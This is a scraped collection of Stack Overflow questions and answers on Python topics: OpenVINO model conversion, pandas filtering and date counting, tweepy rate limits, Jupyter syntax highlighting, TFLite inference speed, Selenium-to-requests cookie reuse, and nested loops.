Run in the command line:\nmo --saved_model_dir \"model\" --data_type FP32 --output_dir \"model_ir\"\n\nRun the inference\nThe converted model can be loaded by the runtime and compiled for a specific device, e.g., CPU or GPU (integrated into your CPU like Intel HD Graphics). If you don't know what the best choice for you is, use AUTO. You care about latency, so I suggest adding a performance hint (as shown below) to use the device that fulfills your requirement.\n# Load the network\nie = Core()\nmodel_ir = ie.read_model(model=\"model_ir/model.xml\")\ncompiled_model_ir = ie.compile_model(model=model_ir, device_name=\"AUTO\", config={\"PERFORMANCE_HINT\":\"LATENCY\"})\n\n# Get output layer\noutput_layer_ir = compiled_model_ir.output(0)\n\n# Run inference on the input image\nresult = compiled_model_ir([input_image])[output_layer_ir]\n\nDisclaimer: I work on OpenVINO. OpenVINO is optimized for Intel hardware.\n" ]
[ 1, 0, 0 ]
[]
[]
[ "keras", "performance", "python", "tensorflow" ]
stackoverflow_0061875324_keras_performance_python_tensorflow.txt
Q: Querying a dataframe to return rows based on a list/ndarray of conditions Say I have a dataframe 'df': And an array of numbers, called 'profiles': [310, 47, 161, 51, 78, 162, 303, 314, 176, 54] I'm trying to query 'df' on column 'dayNo' to only returns rows which match the array above (profiles), but not sure how. I attempted the below, but to no avail: df2 = df.loc[df['dayNo'] == [np.array([profiles], dtype=bool)]] Any help greatly appreciated, thanks! A: You can use boolean indexing with pandas.Series.isin : df2 = df.loc[df['dayNo'].isin(profiles)] Another method is pandas.DataFrame.query : df2 = df.query('dayNo in @profiles')
Querying a dataframe to return rows based on a list/ndarray of conditions
Say I have a dataframe 'df': And an array of numbers, called 'profiles': [310, 47, 161, 51, 78, 162, 303, 314, 176, 54] I'm trying to query 'df' on column 'dayNo' to only returns rows which match the array above (profiles), but not sure how. I attempted the below, but to no avail: df2 = df.loc[df['dayNo'] == [np.array([profiles], dtype=bool)]] Any help greatly appreciated, thanks!
[ "You can use boolean indexing with pandas.Series.isin :\ndf2 = df.loc[df['dayNo'].isin(profiles)]\n\nAnother method is pandas.DataFrame.query :\ndf2 = df.query('dayNo in @profiles')\n\n" ]
[ 2 ]
[]
[]
[ "numpy", "pandas", "python" ]
stackoverflow_0074574903_numpy_pandas_python.txt
Q: How to get all the likes of a twitter user using tweepy I'm using tweepy with 1.1 API and Elevated access. I have been trying to request all the likes of a user but there seems to be a limit of about 1430 returned tweets. I've tried with a couple of test accounts and it seems to get 1430-1440 then a "Too Many Requests - Rate limit exceeded" error is returned. This is the call: tweepy.Cursor( api.get_favorites, screen_name=twitterUsername ).items( 3000 ) When I call rate_limit_status() the only out of limits value is '/favorites/list', but the limit appears to be 75: Limit:75 Remaining: 0 Reset: {timestamp for 15 minutes later}. Frustratingly, initially the rate limit seemed to be more generous (over 2500 tweets were returned) Is there a way to work with Twitter's limits so that I can have access and work with all the likes of a user? Or at least is there a way to ask for the likes before a certain date? A: Pay careful attention to the word "rate" in that diagnostic. It refers to "records per hour", rather than "total number of records". Twitter offer extensive documentation on this topic: https://developer.twitter.com/en/docs/twitter-api/rate-limits#recovering You obtained a 429 status because you ignored the rate limit. Just sleep() a bit between requests. Code that does a one-off query and fails to sleep will more likely trigger a rate error when querying many records back-to-back than when querying few records. Consider using the excellent tenacity back-off / retry library.
How to get all the likes of a twitter user using tweepy
I'm using tweepy with 1.1 API and Elevated access. I have been trying to request all the likes of a user but there seems to be a limit of about 1430 returned tweets. I've tried with a couple of test accounts and it seems to get 1430-1440 then a "Too Many Requests - Rate limit exceeded" error is returned. This is the call: tweepy.Cursor( api.get_favorites, screen_name=twitterUsername ).items( 3000 ) When I call rate_limit_status() the only out of limits value is '/favorites/list', but the limit appears to be 75: Limit:75 Remaining: 0 Reset: {timestamp for 15 minutes later}. Frustratingly, initially the rate limit seemed to be more generous (over 2500 tweets were returned) Is there a way to work with Twitter's limits so that I can have access and work with all the likes of a user? Or at least is there a way to ask for the likes before a certain date?
[ "Pay careful attention to the word \"rate\" in that diagnostic.\nIt refers to \"records per hour\",\nrather than \"total number of records\".\nTwitter offer extensive documentation on this topic:\nhttps://developer.twitter.com/en/docs/twitter-api/rate-limits#recovering\nYou obtained a 429 status because you ignored the\nrate limit. Just sleep() a bit between requests.\nCode that does a one-off query and fails to sleep\nwill more likely trigger a rate error\nwhen querying many records back-to-back\nthan when querying few records.\nConsider using the excellent tenacity back-off / retry library.\n" ]
[ 1 ]
[]
[]
[ "api", "python", "tweepy", "twitter" ]
stackoverflow_0074574920_api_python_tweepy_twitter.txt
Q: Create a counter of date values for a given max-min interval Be the following python pandas DataFrame: | date | column_1 | column_2 | | ---------- | -------- | -------- | | 2022-02-01 | val | val2 | | 2022-02-03 | val1 | val | | 2022-02-01 | val | val3 | | 2022-02-04 | val2 | val | | 2022-02-27 | val2 | val4 | I want to create a new DataFrame, where each row has a value between the minimum and maximum date value from the original DataFrame. The counter column contains a row counter for that date. | date | counter | | ---------- | -------- | | 2022-02-01 | 2 | | 2022-02-02 | 0 | | 2022-02-03 | 1 | | 2022-02-04 | 1 | | 2022-02-05 | 0 | ... | 2022-02-26 | 0 | | 2022-02-27 | 1 | A: Count dates first & remove duplicates using Drop duplicates. Fill intermidiate dates with Pandas has asfreq function for datetimeIndex, this is basically just a thin, but convenient wrapper around reindex() which generates a date_range and calls reindex. df['counts'] = df['date'].map(df['date'].value_counts()) df = df.drop_duplicates(subset='date', keep="first") df.date = pd.to_datetime(df.date) df = df.set_index('date').asfreq('D').reset_index() df = df.fillna(0) print(df) Gives # date counts 0 2022-02-01 2.0 1 2022-02-02 0.0 2 2022-02-03 1.0 3 2022-02-04 1.0 4 2022-02-05 0.0 5 2022-02-06 0.0 6 2022-02-07 0.0 7 2022-02-08 0.0 8 2022-02-09 0.0 9 2022-02-10 0.0 10 2022-02-11 0.0 11 2022-02-12 0.0 12 2022-02-13 0.0 13 2022-02-14 0.0 14 2022-02-15 0.0 15 2022-02-16 0.0 16 2022-02-17 0.0 17 2022-02-18 0.0 18 2022-02-19 0.0 19 2022-02-20 0.0 20 2022-02-21 0.0 21 2022-02-22 0.0 22 2022-02-23 0.0 23 2022-02-24 0.0 24 2022-02-25 0.0 25 2022-02-26 0.0 A: Many ways to do this. Here is mine. Probably not optimal, but at least I am not iterating rows, nor using .apply, which are both sure recipes to create slow solutions import pandas as pd import datetime # A minimal example (you should provide such an example next time) df=pd.DataFrame({'date':pd.to_datetime(['2022-02-01', '2022-02-03', '2022-02-01', '2022-02-04', '2022-02-27']), 'c1':['val','val1','val','val2','val2'], 'c2':range(5)}) # A delta of 1 day, to create list of date dt=datetime.timedelta(days=1) # Result dataframe, with a count of 0 for now res=pd.DataFrame({'date':df.date.min()+dt*np.arange((df.date.max()-df.date.min()).days+1), 'count':0}) # Cound dates countDates=df[['date', 'c1']].groupby('date').agg('count') # Merge the counted dates with the target array, filling missing values with 0 res['count']=res.merge(countDates, on='date', how='left').fillna(0)['c1']
Create a counter of date values for a given max-min interval
Be the following python pandas DataFrame: | date | column_1 | column_2 | | ---------- | -------- | -------- | | 2022-02-01 | val | val2 | | 2022-02-03 | val1 | val | | 2022-02-01 | val | val3 | | 2022-02-04 | val2 | val | | 2022-02-27 | val2 | val4 | I want to create a new DataFrame, where each row has a value between the minimum and maximum date value from the original DataFrame. The counter column contains a row counter for that date. | date | counter | | ---------- | -------- | | 2022-02-01 | 2 | | 2022-02-02 | 0 | | 2022-02-03 | 1 | | 2022-02-04 | 1 | | 2022-02-05 | 0 | ... | 2022-02-26 | 0 | | 2022-02-27 | 1 |
[ "Count dates first & remove duplicates using Drop duplicates. Fill intermidiate dates with Pandas has asfreq function for datetimeIndex, this is basically just a thin, but convenient wrapper around reindex() which generates a date_range and calls reindex.\ndf['counts'] = df['date'].map(df['date'].value_counts())\ndf = df.drop_duplicates(subset='date', keep=\"first\")\n\ndf.date = pd.to_datetime(df.date)\ndf = df.set_index('date').asfreq('D').reset_index()\ndf = df.fillna(0)\nprint(df)\n\nGives #\n date counts\n0 2022-02-01 2.0\n1 2022-02-02 0.0\n2 2022-02-03 1.0\n3 2022-02-04 1.0\n4 2022-02-05 0.0\n5 2022-02-06 0.0\n6 2022-02-07 0.0\n7 2022-02-08 0.0\n8 2022-02-09 0.0\n9 2022-02-10 0.0\n10 2022-02-11 0.0\n11 2022-02-12 0.0\n12 2022-02-13 0.0\n13 2022-02-14 0.0\n14 2022-02-15 0.0\n15 2022-02-16 0.0\n16 2022-02-17 0.0\n17 2022-02-18 0.0\n18 2022-02-19 0.0\n19 2022-02-20 0.0\n20 2022-02-21 0.0\n21 2022-02-22 0.0\n22 2022-02-23 0.0\n23 2022-02-24 0.0\n24 2022-02-25 0.0\n25 2022-02-26 0.0\n\n", "Many ways to do this. Here is mine. Probably not optimal, but at least I am not iterating rows, nor using .apply, which are both sure recipes to create slow solutions\nimport pandas as pd\nimport datetime\n\n# A minimal example (you should provide such an example next time)\ndf=pd.DataFrame({'date':pd.to_datetime(['2022-02-01', '2022-02-03', '2022-02-01', '2022-02-04', '2022-02-27']), 'c1':['val','val1','val','val2','val2'], 'c2':range(5)})\n\n# A delta of 1 day, to create list of date\ndt=datetime.timedelta(days=1)\n\n# Result dataframe, with a count of 0 for now\nres=pd.DataFrame({'date':df.date.min()+dt*np.arange((df.date.max()-df.date.min()).days+1), 'count':0})\n\n# Cound dates\ncountDates=df[['date', 'c1']].groupby('date').agg('count')\n\n# Merge the counted dates with the target array, filling missing values with 0\nres['count']=res.merge(countDates, on='date', how='left').fillna(0)['c1']\n\n" ]
[ 2, 1 ]
[]
[]
[ "dataframe", "datetime", "pandas", "python" ]
stackoverflow_0074574705_dataframe_datetime_pandas_python.txt
Q: How to change syntax highlighting in Jupyter Notebook? a = np.array([1,4,3]) b = np.array([2,-1,5]) a@b df['A'].fillna(value=df['A'].mean()) df.fillna(value=df.mean()) For teaching purposes: I need to apply a special color in Jupyter Notebook for coding to differentiate them from variables: a, b: black by default, ok 1,4,3: Green by default, ok @: Purple by default, ok np.array( ): black >>> need to change it to a different color (blue). 'A': red by default, ok df[ ]: black by default, ok .fillna(value=: black >>> need to change it to a different color (blue). .mean(): black >>> need to change it to a different color (blue). A: As far as I can tell, the Jupyter rendering of python code formatting within a python code cell relies on specific CSS styles. so: pd.DataFrame(...) pd has a CSS style cm.variable (cmstands for codemirror) DataFrame has a CSS style cm.property So the Jupyter notebook sees pd.DataFrame, it only sees variable.property. see picture: python: 3.10.7 (tags/v3.10.7:6cc6b13, Sep 5 2022, 14:08:36) [MSC v.1933 64 bit (AMD64)] jupyterlab==3.5.0 ipython==8.6.0 This seems to indicate there is no distinction between class attributes, class methods, class properties, module attributes etc... I think it is because the python code is parsed and styled within the HTML rendering. Here is where the magic occurs <server>/static/notebook/js/notebook/js/codemirror-ipython.js and here: <server>/static/notebook/js/components/codemirror/ (and child dir/files (<server>/static/notebook/js/components/codemirror/mode/python/python.js )) You will find all the parsing code there, which seem to only treat the code present inside an (HTML) cell. From what I see, there is little to no indication that the JS code is able to go down the imports/callgraphs to determine the precise nature of code tokens like an IDE would (say PyCharm). sample: var wordOperators = wordRegexp(["and", "or", "not", "is"]); var commonKeywords = ["as", "assert", "break", "class", "continue", "def", "del", "elif", "else", "except", "finally", "for", "from", "global", "if", "import", "lambda", "pass", "raise", "return", "try", "while", "with", "yield", "in"]; var commonBuiltins = ["abs", "all", "any", "bin", "bool", "bytearray", "callable", "chr", "classmethod", "compile", "complex", "delattr", "dict", "dir", "divmod", "enumerate", "eval", //... Maybe we can see things this way : a Jupyter notebook is not really an IDE, it may be better seen as an HTTP page that sends string to a python console : page sends print('foo'), (interactive) console does something roughly equivalent of python -c "print('foo')" and some glue gets the results and sends it back to HTML. Unless: someone points to the precise configuration parameter for Jupyter server pages that I could not find and/or Jupyter dev teams add a better parsing capability for HTML rendering, OP desire seems impossible to achieve. You may be able to change color styles to a custom one, but not enhance the parsing capability on the HTML notebook rendering side to be more precise. 
But, within a specialized IDE that has supports for notebooks (say PyCharm pro (see https://www.jetbrains.com/help/pycharm/jupyter-notebook-support.html#tool-windows which shows advanced debugging capability, which makes me think I'm right :)) or VS code (ref needed)), maybe things can be different since the IDE can have a visibility on the whole python install/modules codebase and has access to its specialized code parsing and rendering engine (which in this case basically replaces what the Jupyter JavaScript code does !). For teaching purposes I think an actual specialized IDE is the go-to tool for such precise syntax highlighting for emphasis on the nature of each code tokens. see PyCharm config for function calls: where the style is inherited from: (of course you can set your own global defaults or language specific defaults ... that depends on the IDE)
How to change syntax highlighting in Jupyter Notebook?
a = np.array([1,4,3]) b = np.array([2,-1,5]) a@b df['A'].fillna(value=df['A'].mean()) df.fillna(value=df.mean()) For teaching purposes: I need to apply a special color in Jupyter Notebook for coding to differentiate them from variables: a, b: black by default, ok 1,4,3: Green by default, ok @: Purple by default, ok np.array( ): black >>> need to change it to a different color (blue). 'A': red by default, ok df[ ]: black by default, ok .fillna(value=: black >>> need to change it to a different color (blue). .mean(): black >>> need to change it to a different color (blue).
[ "As far as I can tell, the Jupyter rendering of python code formatting within a python code cell relies on specific CSS styles.\nso:\npd.DataFrame(...)\n\npd has a CSS style cm.variable (cmstands for codemirror)\nDataFrame has a CSS style cm.property\nSo the Jupyter notebook sees pd.DataFrame, it only sees variable.property.\nsee picture:\n\npython: 3.10.7 (tags/v3.10.7:6cc6b13, Sep 5 2022, 14:08:36) [MSC v.1933 64 bit (AMD64)]\njupyterlab==3.5.0\nipython==8.6.0\n\nThis seems to indicate there is no distinction between class attributes, class methods, class properties, module attributes etc...\nI think it is because the python code is parsed and styled within the HTML rendering.\nHere is where the magic occurs\n<server>/static/notebook/js/notebook/js/codemirror-ipython.js\nand here:\n<server>/static/notebook/js/components/codemirror/ (and child dir/files (<server>/static/notebook/js/components/codemirror/mode/python/python.js ))\nYou will find all the parsing code there, which seem to only treat the code present inside an (HTML) cell. From what I see, there is little to no indication that the JS code is able to go down the imports/callgraphs to determine the precise nature of code tokens like an IDE would (say PyCharm).\nsample:\n var wordOperators = wordRegexp([\"and\", \"or\", \"not\", \"is\"]);\n var commonKeywords = [\"as\", \"assert\", \"break\", \"class\", \"continue\",\n \"def\", \"del\", \"elif\", \"else\", \"except\", \"finally\",\n \"for\", \"from\", \"global\", \"if\", \"import\",\n \"lambda\", \"pass\", \"raise\", \"return\",\n \"try\", \"while\", \"with\", \"yield\", \"in\"];\n var commonBuiltins = [\"abs\", \"all\", \"any\", \"bin\", \"bool\", \"bytearray\", \"callable\", \"chr\",\n \"classmethod\", \"compile\", \"complex\", \"delattr\", \"dict\", \"dir\", \"divmod\",\n \"enumerate\", \"eval\",\n//...\n\nMaybe we can see things this way : a Jupyter notebook is not really an IDE, it may be better seen as an HTTP page that sends string to a python console : page sends print('foo'), (interactive) console does something roughly equivalent of python -c \"print('foo')\" and some glue gets the results and sends it back to HTML.\nUnless:\n\nsomeone points to the precise configuration parameter for Jupyter server pages that I could not find\nand/or Jupyter dev teams add a better parsing capability for HTML rendering,\n\nOP desire seems impossible to achieve.\nYou may be able to change color styles to a custom one, but not enhance the parsing capability on the HTML notebook rendering side to be more precise.\nBut, within a specialized IDE that has supports for notebooks (say PyCharm pro (see https://www.jetbrains.com/help/pycharm/jupyter-notebook-support.html#tool-windows which shows advanced debugging capability, which makes me think I'm right :)) or VS code (ref needed)), maybe things can be different since the IDE can have a visibility on the whole python install/modules codebase and has access to its specialized code parsing and rendering engine (which in this case basically replaces what the Jupyter JavaScript code does !).\n\n\nFor teaching purposes\n\nI think an actual specialized IDE is the go-to tool for such precise syntax highlighting for emphasis on the nature of each code tokens.\nsee PyCharm config for function calls:\n\nwhere the style is inherited from:\n\n(of course you can set your own global defaults or language specific defaults ... that depends on the IDE)\n" ]
[ 1 ]
[]
[]
[ "jupyter_notebook", "python", "syntax_highlighting" ]
stackoverflow_0052877167_jupyter_notebook_python_syntax_highlighting.txt
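A note on the highlighting answer above: since the classic Notebook only distinguishes broad CodeMirror token classes (variable, property, builtin, keyword), one practical workaround is to restyle those classes with CSS. The sketch below is an assumption, not an official API: the cm-s-ipython / cm-property / cm-builtin class names are inferred from the CodeMirror Python mode described in the answer and should be verified with the browser's element inspector; injecting the style from a cell lasts only for the current session (placing the same rules in ~/.jupyter/custom/custom.css makes them permanent). It also recolors every property token, not just np.array or .fillna, which is exactly the limitation the answer describes.

from IPython.display import HTML, display

# Assumed CodeMirror token classes; verify them before relying on this.
custom_css = """
<style>
.cm-s-ipython span.cm-property { color: #1f77b4; }  /* attribute/method names such as .array, .fillna, .mean */
.cm-s-ipython span.cm-builtin  { color: #1f77b4; }  /* built-ins such as print, len */
</style>
"""
display(HTML(custom_css))  # run in a notebook cell to restyle the code cells on the page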
Q: Tensorflow lite model inference is very slow compared to keras h5 model (VGG16 pretrained) Tensorflow lite predictions are extremely slow compared to keras (h5) model. The behavior is similar between Colab and also on Windows 10 system. I converted the standard VGG16 model to tflite both with and without optimization (converter.optimizations = [tf.lite.Optimize.DEFAULT]) Here are the results I got: Keras model (540MB) prediction time: 0.14 seconds tflite without optimization (540MB) prediction time: 0.5 seconds tflite with optimization (135MB) prediction time: 39 seconds Am I missing something here? Isn't tflite supposed to be optimized for speed? Would the behavior be different on Raspberry Pi or other 'lighter' devices? Link to the code on colab A: TensorFlow Lite isn't optimized for desktop/server, so its not surprising that it performs badly for most models in those environments. TFLite's optimized kernels (including lot of their GEMM operations) are especially geared for mobile CPUs (which don't have the same instruction set as desktop CPUs IIUC). Standard TensorFlow is better for your use-case. A: I agree with Sachin. TFLite's intended use is mobile devices. However, if you need faster inference on a desktop or server you can try OpenVINO. OpenVINO is optimized for Intel hardware, but it should work with any CPU. It optimizes your model by converting to Intermediate Representation (IR), performing graph pruning and fusing some operations into others while preserving accuracy. Then it uses vectorization in runtime. It's rather straightforward to convert the Keras model to OpenVINO. The full tutorial on how to do it can be found here. Some snippets are below. Install OpenVINO The easiest way to do it is using PIP. Alternatively, you can use this tool to find the best way in your case. pip install openvino-dev[tensorflow2] Save your model as SavedModel OpenVINO is not able to convert the HDF5 model, so you have to save it as SavedModel first. import tensorflow as tf from custom_layer import CustomLayer model = tf.keras.models.load_model('model.h5', custom_objects={'CustomLayer': CustomLayer}) tf.saved_model.save(model, 'model') Use Model Optimizer to convert SavedModel model The Model Optimizer is a command-line tool that comes from OpenVINO Development Package. It converts the Tensorflow model to IR, a default format for OpenVINO. You can also try the precision of FP16, which should give you better performance without a significant accuracy drop (change data_type). Run in the command line: mo --saved_model_dir "model" --data_type FP32 --output_dir "model_ir" Run the inference The converted model can be loaded by the runtime and compiled for a specific device, e.g., CPU or GPU (integrated into your CPU like Intel HD Graphics). I suggest using an AUTO device. It will choose the best hardware for you. Moreover, if you care about latency, provide that performance hint (as shown below). If you depend on throughput, use THROUGHPUT or CUMULATIVE_THROUGHPUT instead. # Load the network ie = Core() model_ir = ie.read_model(model="model_ir/model.xml") compiled_model_ir = ie.compile_model(model=model_ir, device_name="AUTO", config={"PERFORMANCE_HINT":"LATENCY"}) # Get output layer output_layer_ir = compiled_model_ir.output(0) # Run inference on the input image result = compiled_model_ir([input_image])[output_layer_ir] Disclaimer: I work on OpenVINO.
Tensorflow lite model inference is very slow compared to keras h5 model (VGG16 pretrained)
Tensorflow lite predictions are extremely slow compared to keras (h5) model. The behavior is similar between Colab and also on Windows 10 system. I converted the standard VGG16 model to tflite both with and without optimization (converter.optimizations = [tf.lite.Optimize.DEFAULT]) Here are the results I got: Keras model (540MB) prediction time: 0.14 seconds tflite without optimization (540MB) prediction time: 0.5 seconds tflite with optimization (135MB) prediction time: 39 seconds Am I missing something here? Isn't tflite supposed to be optimized for speed? Would the behavior be different on Raspberry Pi or other 'lighter' devices? Link to the code on colab
[ "TensorFlow Lite isn't optimized for desktop/server, so its not surprising that it performs badly for most models in those environments. TFLite's optimized kernels (including lot of their GEMM operations) are especially geared for mobile CPUs (which don't have the same instruction set as desktop CPUs IIUC).\nStandard TensorFlow is better for your use-case.\n", "I agree with Sachin. TFLite's intended use is mobile devices.\nHowever, if you need faster inference on a desktop or server you can try OpenVINO. OpenVINO is optimized for Intel hardware, but it should work with any CPU. It optimizes your model by converting to Intermediate Representation (IR), performing graph pruning and fusing some operations into others while preserving accuracy. Then it uses vectorization in runtime.\nIt's rather straightforward to convert the Keras model to OpenVINO. The full tutorial on how to do it can be found here. Some snippets are below.\nInstall OpenVINO\nThe easiest way to do it is using PIP. Alternatively, you can use this tool to find the best way in your case.\npip install openvino-dev[tensorflow2]\n\nSave your model as SavedModel\nOpenVINO is not able to convert the HDF5 model, so you have to save it as SavedModel first.\nimport tensorflow as tf\nfrom custom_layer import CustomLayer\nmodel = tf.keras.models.load_model('model.h5', custom_objects={'CustomLayer': CustomLayer})\ntf.saved_model.save(model, 'model')\n\nUse Model Optimizer to convert SavedModel model\nThe Model Optimizer is a command-line tool that comes from OpenVINO Development Package. It converts the Tensorflow model to IR, a default format for OpenVINO. You can also try the precision of FP16, which should give you better performance without a significant accuracy drop (change data_type). Run in the command line:\nmo --saved_model_dir \"model\" --data_type FP32 --output_dir \"model_ir\"\n\nRun the inference\nThe converted model can be loaded by the runtime and compiled for a specific device, e.g., CPU or GPU (integrated into your CPU like Intel HD Graphics). I suggest using an AUTO device. It will choose the best hardware for you. Moreover, if you care about latency, provide that performance hint (as shown below). If you depend on throughput, use THROUGHPUT or CUMULATIVE_THROUGHPUT instead.\n# Load the network\nie = Core()\nmodel_ir = ie.read_model(model=\"model_ir/model.xml\")\ncompiled_model_ir = ie.compile_model(model=model_ir, device_name=\"AUTO\", config={\"PERFORMANCE_HINT\":\"LATENCY\"})\n\n# Get output layer\noutput_layer_ir = compiled_model_ir.output(0)\n\n# Run inference on the input image\nresult = compiled_model_ir([input_image])[output_layer_ir]\n\nDisclaimer: I work on OpenVINO.\n" ]
[ 0, 0 ]
[]
[]
[ "keras", "python", "tensorflow" ]
stackoverflow_0066912736_keras_python_tensorflow.txt
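A supplement to the timing comparison above: it helps to benchmark the TFLite interpreter directly and give it several CPU threads, since on desktop it may otherwise run single-threaded. A minimal sketch, assuming a converted vgg16.tflite file exists (the path, thread count, and repeat count are placeholders):

import time
import numpy as np
import tensorflow as tf

interpreter = tf.lite.Interpreter(model_path="vgg16.tflite", num_threads=4)
interpreter.allocate_tensors()
inp = interpreter.get_input_details()[0]
out = interpreter.get_output_details()[0]

x = np.random.rand(*inp["shape"]).astype(inp["dtype"])  # dummy input matching the model
interpreter.set_tensor(inp["index"], x)
interpreter.invoke()  # warm-up run, excluded from timing

start = time.perf_counter()
for _ in range(10):
    interpreter.set_tensor(inp["index"], x)
    interpreter.invoke()
print("avg latency:", (time.perf_counter() - start) / 10, "s")
y = interpreter.get_tensor(out["index"])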
Q: Logging in with Selenium then submitting requests with Python Requests gives error 401 I have the following code to log in to a website with Selenium, then submit a request with Requests. I can't easily stick to just requests or just Selenium for this project. I need both. Selenium successfully logs in, but Requests gives an error 401 with any requests I submit. The Requests code was generated by Insomnia, and it works fine if I pass through cookies from my browser after manually logging in. I'm not sure what I need to do to get this to work. Any help is appreciated! import selenium from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium.webdriver.support.wait import WebDriverWait import requests webdriver = selenium.webdriver.Firefox() session = requests.Session() webdriver.get("example.website") email_field = WebDriverWait(webdriver, 10).until(EC.element_to_be_clickable((By.ID, "username-field"))) email_field.send_keys("username") password_field = WebDriverWait(webdriver, 10).until(EC.element_to_be_clickable((By.ID, "password-field"))) password_field.send_keys("password") WebDriverWait(webdriver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, "login-button"))).click() WebDriverWait(webdriver, 10).until(EC.url_matches("loggedin.url")) for cookie in webdriver.get_cookies(): session.cookies.set(cookie['name'], cookie['value']) webdriver.close() url = "url.for/request" headers = { "authority": "authority.url", "accept": "application/json, text/plain, */*", "accept-language": "en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7,en-GB;q=0.6", "content-type": "application/json", "referer": "referal.url", "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": "Linux", "sec-fetch-dest": "empty", "sec-fetch-mode": "cors", "sec-fetch-site": "same-origin", "user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0" } response = session.request("GET", url, headers=headers) print(response.text) A: My solution to this problem has been to use the selenium requests package rather than selenium. This allows you to authenticate using selenium and then use that same webdriver object to send requests to specific APIs. I never found the root cause for trying to re-use the cookies from selenium with a different session, but I suspect the issue was the original authentication knew the webdriver or session being authenticated, so when you switch your authentication token is no longer valid.
Logging in with Selenium then submitting requests with Python Requests gives error 401
I have the following code to log in to a website with Selenium, then submit a request with Requests. I can't easily stick to just requests or just Selenium for this project. I need both. Selenium successfully logs in, but Requests gives an error 401 with any requests I submit. The Requests code was generated by Insomnia, and it works fine if I pass through cookies from my browser after manually logging in. I'm not sure what I need to do to get this to work. Any help is appreciated! import selenium from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium.webdriver.support.wait import WebDriverWait import requests webdriver = selenium.webdriver.Firefox() session = requests.Session() webdriver.get("example.website") email_field = WebDriverWait(webdriver, 10).until(EC.element_to_be_clickable((By.ID, "username-field"))) email_field.send_keys("username") password_field = WebDriverWait(webdriver, 10).until(EC.element_to_be_clickable((By.ID, "password-field"))) password_field.send_keys("password") WebDriverWait(webdriver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, "login-button"))).click() WebDriverWait(webdriver, 10).until(EC.url_matches("loggedin.url")) for cookie in webdriver.get_cookies(): session.cookies.set(cookie['name'], cookie['value']) webdriver.close() url = "url.for/request" headers = { "authority": "authority.url", "accept": "application/json, text/plain, */*", "accept-language": "en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7,en-GB;q=0.6", "content-type": "application/json", "referer": "referal.url", "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": "Linux", "sec-fetch-dest": "empty", "sec-fetch-mode": "cors", "sec-fetch-site": "same-origin", "user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0" } response = session.request("GET", url, headers=headers) print(response.text)
[ "My solution to this problem has been to use the selenium requests package rather than selenium. This allows you to authenticate using selenium and then use that same webdriver object to send requests to specific APIs.\nI never found the root cause for trying to re-use the cookies from selenium with a different session, but I suspect the issue was the original authentication knew the webdriver or session being authenticated, so when you switch your authentication token is no longer valid.\n" ]
[ 0 ]
[]
[]
[ "python", "python_requests", "selenium", "selenium_webdriver" ]
stackoverflow_0073930512_python_python_requests_selenium_selenium_webdriver.txt
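A sketch of the selenium-requests approach mentioned in the answer above. The package's API (a Firefox class wrapping the normal webdriver and exposing a .request method that reuses the browser session) is an assumption to verify against its documentation, and the URLs are placeholders:

# pip install selenium-requests
from seleniumrequests import Firefox  # wraps selenium.webdriver.Firefox

driver = Firefox()
driver.get("https://example.website/login")
# ... perform the same WebDriverWait / send_keys login steps as in the question ...

# Requests sent through the driver go out with the logged-in browser's cookies.
response = driver.request("GET", "https://example.website/url.for/request",
                          headers={"accept": "application/json"})
print(response.status_code, response.text[:200])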
Q: Dealing with Nested For Loops Hello I was wondering if there is an easier and cleaner way of dealing with nested for loops. lst = [['a','b','c','d','e','f','g'],['h','i','j','k','l','m','n','o','p'], ['q','r','s','t','u','v']] path = ['c:\Data_1','c:\Data_2','c:\Data_3'] channel = ['Wholesale','Retail'] category = ['ALL','APPAREL','FOOTWEAR','ACCESSORIES','BAGS'] metric = ['DB','DD','DF','CPT'] for l,p in zip(lst,path): for b in l: #pulls the individual brand by sector sportswear luxury and fashion for c in channel: for a in category: for m in metric: print(b,c,a,m) df = Pricing.loc[(Pricing.brand==b)&(Pricing.channel==c)&(Pricing.el_department==a)] df = df[['observation_date','geography','currency','brand','channel','el_department',m]] df = df.pivot('observation_date','geography',m).reset_index() df['observation_date'] = pd.to_datetime(df['observation_date'],utc=False).dt.date df.sort_values(by='observation_date',ascending=True,inplace=True) A: You can use list comprehension instead of multiple for loop: Here is the example: for l,p in zip(lst,path): result_list = [(b, c, a, m) for b in l for c in channel for a in category for m in metric] print(result_list) Hope it will be helpful :)
Dealing with Nested For Loops
Hello I was wondering if there is an easier and cleaner way of dealing with nested for loops. lst = [['a','b','c','d','e','f','g'],['h','i','j','k','l','m','n','o','p'], ['q','r','s','t','u','v']] path = ['c:\Data_1','c:\Data_2','c:\Data_3'] channel = ['Wholesale','Retail'] category = ['ALL','APPAREL','FOOTWEAR','ACCESSORIES','BAGS'] metric = ['DB','DD','DF','CPT'] for l,p in zip(lst,path): for b in l: #pulls the individual brand by sector sportswear luxury and fashion for c in channel: for a in category: for m in metric: print(b,c,a,m) df = Pricing.loc[(Pricing.brand==b)&(Pricing.channel==c)&(Pricing.el_department==a)] df = df[['observation_date','geography','currency','brand','channel','el_department',m]] df = df.pivot('observation_date','geography',m).reset_index() df['observation_date'] = pd.to_datetime(df['observation_date'],utc=False).dt.date df.sort_values(by='observation_date',ascending=True,inplace=True)
[ "You can use list comprehension instead of multiple for loop:\nHere is the example:\nfor l,p in zip(lst,path): \n result_list = [(b, c, a, m) for b in l for c in channel for a in category for m in metric]\n print(result_list)\n\nHope it will be helpful :)\n" ]
[ 0 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0074559522_pandas_python.txt
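For the nested loops above, itertools.product flattens the four inner loops while keeping the per-combination DataFrame work that the list-comprehension answer drops. A sketch reusing the question's variables (lst, path, channel, category, metric, Pricing) and assuming pandas is imported as pd:

from itertools import product

for l, p in zip(lst, path):
    for b, c, a, m in product(l, channel, category, metric):
        print(b, c, a, m)
        df = Pricing.loc[(Pricing.brand == b) &
                         (Pricing.channel == c) &
                         (Pricing.el_department == a)]
        df = df[['observation_date', 'geography', 'currency',
                 'brand', 'channel', 'el_department', m]]
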